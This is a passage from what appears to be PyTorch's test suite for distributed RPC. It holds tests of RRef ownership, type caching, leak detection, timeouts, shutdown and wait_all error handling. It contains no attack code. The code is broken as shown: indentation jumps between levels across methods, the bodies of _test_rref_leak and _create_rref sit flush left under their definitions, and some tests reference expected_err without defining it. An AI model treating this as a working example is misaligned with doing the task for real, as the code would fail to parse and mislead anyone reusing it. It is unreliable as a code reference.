    self.assertEqual(ret, torch.add(torch.ones(n, n), 1))

@dist_init
def test_local_rref_no_fork(self):
    # A purely local RRef resolves without any RPC machinery.
    local_rref = RRef(35)
    self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
    # ensure that an error message is thrown if a user tries to call
    # local_value() on a non-owning node.
    next_rank = (self.rank + 1) % self.world_size
    rref = rpc.remote(
        worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
    )
    with self.assertRaisesRegex(
        RuntimeError, (
            fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
            fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
            r"can't call localValue\(\) on user "
            fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
            fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
        )
    ):
        rref.local_value()

@dist_init
def test_return_local_rrefs(self):
    # RRefs created and returned by the callee can be mutated and read
    # through subsequent RPCs addressed to their owner.
    n = self.rank + 1
    dst_rank = n % self.world_size

    rref_list = rpc.rpc_sync(
        worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
    )

    for rref in rref_list:
        rpc.rpc_sync(
            rref.owner(),
            _call_method_on_rref,
            args=(MyClass.increment_value, rref, 10),
        )

    rets = [
        rpc.rpc_sync(
            rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
        )
        for rref in rref_list
    ]

    self.assertEqual(rets, [11, 12, 13])
# NOTE: @dist_init decorates the helper; the public test_* wrappers below
# rely on it for setup.
@dist_init
def _test_rref_type(self, blocking):
    # _get_type launches exactly one RPC; subsequent calls are served from
    # the cache (non-blocking calls even return the same cached future).

    def launched_rpc(events):
        expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
        return any([e.name.startswith(expected_name) for e in events])

    dst = worker_name((self.rank + 1) % self.world_size)
    rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))

    with _profile() as p:
        t = rref._get_type(blocking=blocking)
        if not blocking:
            t = t.wait()

    self.assertTrue(launched_rpc(p.function_events))
    expected_type = type(torch.ones(2))
    self.assertEqual(t, expected_type)

    futs = []

    def verify(fut):
        self.assertEqual(fut.value(), expected_type)

    with _profile() as p:
        for _ in range(10):
            t = rref._get_type(blocking=blocking)
            if not blocking:
                futs.append(t)
                t.add_done_callback(verify)
                t = t.wait()
            self.assertEqual(t, expected_type)

    if not blocking:
        # Note that cached calls with blocking=False all return the same
        # cached original future.
        first_fut = futs[0]
        for f in futs[1:]:
            self.assertTrue(f is first_fut)
    # Ensure we never launch another RPC, other than for the very
    # first call.
    self.assertFalse(launched_rpc(p.function_events))
    self.assertEqual(t, type(torch.ones(2)))

    rref = rpc.remote(dst, MyClass, args=(0,))
    rref_type = rref._get_type(blocking=blocking)
    if not blocking:
        rref_type = rref_type.wait()
    self.assertEqual(rref_type, MyClass)

def test_rref_type_blocking(self):
    self._test_rref_type(blocking=True)

def test_rref_type_non_blocking(self):
    self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
    # A creation error surfaces from _get_type: inline when blocking,
    # at wait() when non-blocking.
    dst = worker_name((self.rank + 1) % self.world_size)
    # 10 ms timeout
    rref = rpc.remote(dst, raise_func)
    # Blocking: error raised inline
    if blocking:
        with self.assertRaisesRegex(ValueError, "Expected error"):
            rref._get_type(blocking=blocking)
    else:
        # Non-blocking: Immediately return future, block on wait
        fut = rref._get_type(blocking=blocking)
        with self.assertRaisesRegex(ValueError, "Expected error"):
            fut.wait()

def test_rref_type_with_error_blocking(self):
    self._test_rref_type_with_error(blocking=True)

def test_rref_type_with_error_non_blocking(self):
    self._test_rref_type_with_error(blocking=False)

@dist_init
def _test_rref_type_owner(self, blocking):
    # _get_type on an owner RRef needs no RPC and works in both modes.
    rref = RRef(torch.ones(2) + 1)
    rref_type = rref._get_type(blocking=blocking)
    if not blocking:
        rref_type = rref_type.wait()
    self.assertEqual(rref_type, type(torch.ones(2)))

    rref = RRef(MyClass(0))
    rref_type = rref._get_type(blocking=blocking)
    if not blocking:
        rref_type = rref_type.wait()
    self.assertEqual(rref_type, MyClass)

def test_rref_type_owner_blocking(self):
    self._test_rref_type_owner(blocking=True)

def test_rref_type_owner_non_blocking(self):
    self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
    # Deliberately slow addition, used to exercise _get_type while the
    # remote value is still being created.
    time.sleep(1)
    return x + y

@dist_init
def test_rref_type_slow_init(self):
    # _get_type must block until the slow remote creation finishes.
    dst = worker_name((self.rank + 1) % self.world_size)
    rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
    self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
    # WorkerInfo equality and hashing: all local RRefs share one owner, all
    # remote RRefs on the same rank share another, and the two differ.
    a = RRef(40)
    b = RRef(50)

    other_rank = (self.rank + 1) % self.world_size
    other_a = rpc.remote(
        worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
    )
    other_b = rpc.remote(
        worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
    )
    other_a.to_here()  # to ensure clean termination
    other_b.to_here()

    self.assertNotEqual(a.owner(), 23)
    # NOTE(review): this assertion is repeated verbatim a few lines below;
    # redundant but harmless.
    self.assertEqual(other_a.owner(), other_b.owner())
    self.assertNotEqual(a.owner(), other_a.owner())
    self.assertEqual(other_a.owner(), other_a.owner())
    self.assertEqual(other_a.owner(), other_b.owner())
    self.assertEqual(a.owner(), a.owner())
    self.assertEqual(a.owner(), b.owner())
    self.assertEqual(a.owner(), rpc.get_worker_info())
    # Owners must be usable as dict keys: equal owners collapse to one entry.
    x = dict()
    x[a.owner()] = a
    x[other_a.owner()] = other_a
    self.assertEqual(x[a.owner()], a)
    self.assertEqual(x[b.owner()], a)
    self.assertEqual(x[other_a.owner()], other_a)
    self.assertEqual(x[other_b.owner()], other_a)
    self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
    # A locally-owned RRef can be passed as an argument through all three
    # invocation styles (sync, async, remote).
    n = self.rank + 1
    dst_rank = n % self.world_size
    dst_worker = worker_name(dst_rank)

    rref = RRef(40)
    self.assertEqual(
        rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
    )
    self.assertEqual(
        rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
    )
    self.assertEqual(
        rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
    )

@dist_init
def test_remote_same_worker(self):
    # Two RRefs living on the same worker can be consumed by a third remote
    # call on that worker.
    n = self.rank + 1
    dst_rank = n % self.world_size
    rref_a = rpc.remote(
        worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
    )
    rref_b = rpc.remote(
        worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
    )
    rref_c = rpc.remote(
        worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
    )
    self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
    """
    Tests that it is possible to call an instance method on a remote object
    by using rref.owner() as destination of the call.
    """
    vals = [10, 2, 5, 7]
    dst_rank = (self.rank + 1) % self.world_size
    dst_worker = worker_name(dst_rank)

    # creates a remote object
    rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))

    # modifies state of the remote object via all three invocation styles
    rpc.rpc_sync(
        rref.owner(),
        _call_method_on_rref,
        args=(MyClass.increment_value, rref, vals[1]),
    )
    rpc.rpc_async(
        rref.owner(),
        _call_method_on_rref,
        args=(MyClass.increment_value, rref, vals[2]),
    ).wait()
    rpc.remote(
        rref.owner(),
        _call_method_on_rref,
        args=(MyClass.increment_value, rref, vals[3]),
    ).to_here()

    # queries state of the remote object
    result = rpc.rpc_sync(
        dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
    )

    self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
    @dist_init(setup_rpc=False)
    def test_ignore_rref_leak(self):
        # With _ignore_rref_leak set, shutdown must succeed despite the leak.
        self._test_rref_leak(ignore_leak=True)
    @dist_init
    def test_rref_str(self):
        # Checks the exact __str__ format of both OwnerRRef and UserRRef.
        rref1 = RRef(self.rank)
        id_class = "GloballyUniqueId"
        self.assertEqual(
            "OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
        )
        dst_rank = (self.rank + 1) % self.world_size
        rref2 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        # UserRRef string includes both the RRefId and the ForkId.
        self.assertEqual(
            rref2.__str__(),
            "UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
                id_class, self.rank
            ),
        )
    @dist_init
    def test_rref_get_future(self):
        # Tests that we can obtain the future corresponding to the creation of
        # the RRef on remote end, for builtin ops, Python UDFs, and script
        # functions alike.
        if self.rank == 0:
            # Builtin
            rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
            # UDF
            rref = rpc.remote(worker_name(1), foo_add, args=())
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
            # Script
            rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
            rref.to_here()
            fut = rref._get_future()
            self.assertIsInstance(fut, torch._C.Future)
    @dist_init
    def test_rref_context_debug_info(self):
        # Verifies num_owner_rrefs / num_pending_users in the RRef-context
        # debug info across: local RRef creation, sharing an RRef as an RPC
        # arg, and rpc.remote creation.
        #
        # This test checks local states that are modified by remote workers.
        # This means that we would need barrier before and after every check.
        # The barrier before the check makes sure that all previous states are
        # cleared globally, the barrier after ensures that no following states
        # change gets into the current check.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Check 1: local RRef does not update owners_ map or add a pending user.
        #################################################
        rref1 = RRef(self.rank)
        # don't need a barrier here as local RRef is handled by this thread
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertIn("num_pending_users", info)
        # RRef on local value is not added to context until shared across RPC
        self.assertEqual(0, int(info["num_owner_rrefs"]))
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after the check 1
        dist.barrier()
        # Check 2: Sharing RRef as an arg should update owners_ map
        ###########################################################
        dst_rank = (self.rank + 1) % self.world_size
        rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
        # barrier before check 2
        wait_until_pending_futures_and_users_flushed()
        dist.barrier()
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertEqual(1, int(info["num_owner_rrefs"]))
        # no pending users since the fork is finished
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after check 2
        dist.barrier()
        # clear states for check 2
        rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
        # Wait for owner rref to be cleared; `info` still holds the pre-clear
        # snapshot, so the loop body runs at least once and re-polls.
        while int(info["num_owner_rrefs"]) != 0:
            info = _rref_context_get_debug_info()
            time.sleep(0.1)
        dist.barrier()
        # Check 3: rpc.remote call should update owners_ map
        ####################################################
        rref2 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        rref3 = rpc.remote(
            worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
        )
        rref2.to_here()
        rref3.to_here()
        # barrier before check 3
        wait_until_pending_futures_and_users_flushed()
        dist.barrier()
        info = _rref_context_get_debug_info()
        self.assertIn("num_owner_rrefs", info)
        self.assertEqual(2, int(info["num_owner_rrefs"]))
        # no pending users since the fork is finished
        self.assertEqual(0, int(info["num_pending_users"]))
        # barrier after check 3
        dist.barrier()
    @dist_init
    def test_disable_gil_profiling(self):
        # test that rpc.enable_gil_profiling(false) will result in
        # GIL wait time not being recorded.
        # GIL profiling should be disabled by default.
        dst_rank = (self.rank + 1) % self.world_size
        rpc.rpc_sync(
            worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
        )
        info = rpc.api._get_current_rpc_agent().get_debug_info()
        # key must be absent while profiling is off
        self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
        rpc.enable_gil_profiling(True)
        rpc.rpc_sync(
            worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
        )
        # after enabling, the GIL wait-time metric must appear
        info = rpc.api._get_current_rpc_agent().get_debug_info()
        self.assertIn("agent.gil_average_wait_time_us", info)
    @dist_init(setup_rpc=False)
    def test_local_shutdown(self):
        # test that we can start RPC and then immediately locally shutdown
        # without sending any messages.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        # pass in graceful=False to ensure that we don't wait for other workers.
        rpc.shutdown(graceful=False)
    @dist_init
    def test_debug_info(self):
        # only test keys in this test case. Values should be covered by
        # individual module debug info tests
        import torch.distributed.autograd as dist_autograd
        info = _get_debug_info()
        rref_info = _rref_context_get_debug_info()
        agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
        autograd_info = dist_autograd._get_debug_info()
        # the three sub-modules must not report overlapping keys
        common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
        self.assertEqual(0, len(common_keys))
        expected = {}
        expected.update(rref_info)
        expected.update(agent_info)
        expected.update(autograd_info)
        # Compare key sets in both directions so the check does not depend on
        # dict iteration order.
        for key in expected.keys():
            self.assertIn(key, info.keys())
        for key in info.keys():
            self.assertIn(key, expected.keys())
    @dist_init(setup_rpc=False)
    @sandcastle_skip_if(
        IS_MACOS,
        "Test is flaky on MacOS since libuv error handling is not as robust as TCP",
    )
    def test_handle_send_exceptions(self):
        # test that if a callee node has gone down, we raise an appropriate
        # exception instead of just crashing.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        rpc._set_rpc_timeout(10)
        # This barrier is needed to ensure that some workers do not exit before
        # others have been brought up.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        if self.rank == 1:
            dst_rank = (self.rank + 1) % self.world_size
            dst_worker = worker_name(dst_rank)
            # allow destination worker to exit without joining
            error_str = self.get_shutdown_error_regex()
            wait_until_node_failure(dst_rank, error_str)
            fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
            # Shutdown sequence is not very well defined and as a result
            # we can see any of the error messages defined in get_shutdown_error_regex.
            with self.assertRaisesRegex(RuntimeError, error_str):
                fut.wait()
        # exit all workers non-gracefully.
        rpc.shutdown(graceful=False)
    @dist_init
    def test_deadlock(self):
        # this test is copied from https://github.com/pytorch/pytorch/issues/45089
        # regression test: an RPC issued while a process group is (or is about
        # to be) initialized must not deadlock.
        if self.rank == 1:
            dst1 = worker_name((self.rank + 1) % self.world_size)
            x = torch.ones(2)
            y = torch.ones(2)
            rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
        dist_initialized = dist.is_initialized()
        if not dist_initialized:
            dist.init_process_group(
                backend="gloo",
                init_method=self.file_init_method,
                rank=self.rank,
                world_size=self.world_size,
            )
    @dist_init(setup_rpc=False)
    def test_local_shutdown_with_rpc(self):
        # test that we can start RPC, send RPCs, and then run local shutdown.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        n = self.rank + 1
        dst_rank = n % self.world_size
        rpc.rpc_sync(
            worker_name(dst_rank),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        # A barrier is needed to ensure that all RPCs are processed.
        # Otherwise, some RPCs can timeout since the receiving end
        # has terminated.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        # pass in graceful=False to ensure that we don't wait for other workers.
        rpc.shutdown(graceful=False)
    @dist_init(setup_rpc=False)
    def test_set_and_get_default_rpc_timeout(self):
        # A timeout set through the backend options must be reflected by
        # rpc.get_rpc_timeout() after init.
        timeout = 0.5
        # A new `RpcBackendOptions` is constructed
        # when accessing `self.rpc_backend_options`.
        rpc_backend_options = self.rpc_backend_options
        rpc_backend_options.rpc_timeout = timeout
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=rpc_backend_options,
        )
        set_timeout = rpc.get_rpc_timeout()
        self.assertEqual(timeout, set_timeout)
        rpc.shutdown()
    @dist_init
    def test_default_timeout_used(self):
        """
        Tests that if no timeout is passed into rpc_async and rpc_sync, then the
        default timeout is used.
        """
        dst_rank = (self.rank + 1) % self.world_size
        rpc._set_rpc_timeout(0.001)  # 1 ms
        # futures should time out and be marked with an exception indicating it as such.
        futs = [
            rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
            for _ in range(10)
        ]
        expected_error = self.get_timeout_error_regex()
        for fut in futs:
            with self.assertRaisesRegex(RuntimeError, expected_error):
                fut.wait()
        # ensure that if a new timeout is set old futures don't time out but new ones do.
        rpc._set_rpc_timeout(200)  # 200 seconds
        # create a longstanding RPC.
        fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
        # now, set a short timeout.
        rpc._set_rpc_timeout(0.001)
        # fut2 should time out, fut1 should not.
        fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut2.wait()
        fut1.wait()
        # Zero timeout means infinity, so future should run to completion.
        rpc._set_rpc_timeout(0)
        rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
        # reset to default timeout so shutdown messages can process cleanly.
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    @dist_init
    def test_rpc_timeouts(self):
        # Checks per-call timeouts for rpc_sync/rpc_async, their interaction
        # with the agent-wide default, and that timeout=0 disables timeouts.
        # TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker = worker_name(dst_rank)
        timeout = 0.1  # 100 ms
        expected_error = self.get_timeout_error_regex()
        # Test async UDF
        fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure run to completion if there is no timeout and we use the default
        # RPC timeout.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
        # Test sync UDF
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
        # Ensure run to completion if there is no timeout and we use the default
        # RPC timeout.
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
        # If we set a default timeout for RPCs, it should be respected, though
        # still overridden if we pass in a different timeout to the APIs.
        rpc._set_rpc_timeout(0.001)
        fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
        # The RPCs should run to completion since we override the timeout.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
        # Passing in a zero timeout should ensure that the RPC won't time out.
        rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
        rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
        # Reset for clean shutdown
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    def test_dist_init_decorator(self):
        # Exercises both decorator spellings: called with arguments
        # (`@dist_init(setup_rpc=False)`) and bare (`@dist_init`). The second
        # `test_func` intentionally shadows the first.
        @dist_init(setup_rpc=False)
        def test_func(self):
            return "expected result"
        self.assertEqual(test_func(self), "expected result")

        @dist_init
        def test_func(self):
            return "expected result"
        self.assertEqual(test_func(self), "expected result")
    def test_use_rpc_pickler(self):
        # _use_rpc_pickler must swap the default pickler only within the
        # context, restoring _internal_rpc_pickler on exit.
        class TestPickler:
            pass
        test_pickler = TestPickler()
        with _use_rpc_pickler(test_pickler):
            self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
        self.assertTrue(
            torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
        )
    @dist_init
    def test_wait_all(self):
        # _wait_all should collect futures created inside the context and wait
        # for them on exit, cleaning up the thread-local list afterwards.
        with _wait_all():
            self.assertTrue(_thread_local_var.future_list == [])
            dst = worker_name((self.rank + 1) % self.world_size)
            fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
            self.assertTrue(len(_thread_local_var.future_list) == 1)
            self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
        # on context exit all futures are done
        self.assertTrue(fut.done())
        self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_multiple_call(self):
        # Only rpc_async futures should be tracked by _wait_all; interleaved
        # rpc_sync calls must not add entries.
        with _wait_all():
            self.assertTrue(_thread_local_var.future_list == [])
            dst = worker_name((self.rank + 1) % self.world_size)
            for i in range(20):
                fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
                res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
                self.assertEqual(res, torch.ones(i, i) + 1)
                self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
            self.assertTrue(len(_thread_local_var.future_list) == 20)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_timeout(self):
        # A future that times out inside _wait_all must propagate the timeout
        # error out of the context manager.
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            with _wait_all():
                self.assertTrue(_thread_local_var.future_list == [])
                dst = worker_name((self.rank + 1) % self.world_size)
                timeout = 0.1  # 100 ms
                fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_raise_in_user_func(self):
        # An exception raised by the remote UDF must surface when _wait_all
        # waits on the future at context exit.
        with self.assertRaises(ValueError):
            with _wait_all():
                self.assertTrue(_thread_local_var.future_list == [])
                dst = worker_name((self.rank + 1) % self.world_size)
                fut = rpc.rpc_async(dst, raise_func)
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    @dist_init
    def test_wait_all_raise_in_body(self):
        # An exception raised directly in the _wait_all body must propagate and
        # still clean up the thread-local future list.
        with self.assertRaises(ValueError):
            with _wait_all():
                raise_func()
        self.assertFalse(hasattr(_thread_local_var, "future_list"))
    # Event used by `timed_out_rpc` to block the callee; each test that uses it
    # re-initializes the event in its own subprocess.
    timed_out_rpc_event = None

    @staticmethod
    def timed_out_rpc():
        # Blocks until the driving test calls `timed_out_rpc_event.set()`.
        RpcTest.timed_out_rpc_event.wait()
    @dist_init
    def test_wait_all_exit_early_python(self):
        # wait_all must surface a Python UDF error (fut2) even while another
        # future (fut1) is still blocked.
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        fut2 = rpc.rpc_async(dst, raise_func)
        fut3 = rpc.rpc_async(dst, raise_func)
        # We should receive the error from fut2
        with self.assertRaisesRegex(ValueError, expected_err):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_wait_all_exit_early_builtin(self):
        # wait_all must surface a builtin-op error (shape mismatch in fut2)
        # even while another future (fut1) is still blocked.
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
        fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
        # We should receive the error from fut2
        with self.assertRaisesRegex(RuntimeError, "size of tensor"):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_wait_all_exit_early_script_function(self):
        # wait_all must surface a TorchScript function error (fut2) even while
        # another future (fut1) is still blocked.
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
        fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
        # We should receive the error from fut2
        with self.assertRaisesRegex(RuntimeError, expected_err):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_function_not_on_callee(self):
        # test that if a function does not exist on a callee, we don't crash,
        # instead we get an AttributeError indicating that the func does not exist.
        this_module = sys.modules[__name__]
        caller_worker = "worker0"
        callee_worker = "worker1"

        if self.rank == 1:
            # Use delattr to remove the binding of a func on this nodes
            delattr(this_module, "foo_add")
            # notify remote end that we have removed it.
            rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))

        if self.rank == 0:
            # func exists on caller, but not callee.
            # wait for remote end to remove the binding of foo_add func.
            wait_for_value_future()
            # Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
            self.assertTrue(hasattr(this_module, "foo_add"))
            with self.assertRaisesRegex(
                RuntimeError, "RPC pickler does not serialize"
            ):
                rpc.rpc_sync(callee_worker, foo_add, args=())
    @dist_init
    def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
        # A UserRRef held by an object in a reference cycle is not freed by
        # refcounting; shutdown must still handle it without hanging.
        dst_worker_name = worker_name((self.rank + 1) % self.world_size)
        a = MyClass(1)
        b = MyClass(2)
        # This is to make Python not garbage collect a and b.
        a.other = b
        b.other = a
        n = self.rank
        a.rref = rpc.remote(
            dst_worker_name,
            torch.add,
            args=(torch.ones(n, n), 2)
        )
    @dist_init(setup_rpc=False)
    def test_use_rref_after_shutdown(self):
        # After graceful shutdown deletes local UserRRefs, both to_here() and
        # serialization (forking) must raise clear errors.
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref = rpc.remote(
            worker_name(dst_rank),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        # pass in graceful=True to ensure that local UserRRefs are deleted.
        rpc.shutdown(graceful=True)
        with self.assertRaisesRegex(
            RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
        ):
            rref.to_here()
        with self.assertRaisesRegex(
            RuntimeError, "Cannot call fork an UserRRef after deletion."
        ):
            import torch.distributed.rpc.internal as internal
            internal.serialize(rref)
    @staticmethod
    def _return_gpu_tensor():
        # Helper: returns a CUDA tensor on device 0 (requires a GPU on callee).
        return torch.rand(3, 3).cuda(0)
    @staticmethod
    def _return_gpu_tensor_list():
        # Helper: returns CUDA tensors on two different devices (needs 2 GPUs).
        return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
    @staticmethod
    def _gpu_tensor_list_arg(tensor_list):
        # Helper: accepts a (GPU) tensor list argument; returns a CPU tensor.
        return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
    @dist_init
    def test_user_rrefs_confirmed(self):
        # Passing a UserRRef as an rpc_sync arg must succeed once the RRef is
        # confirmed by its owner.
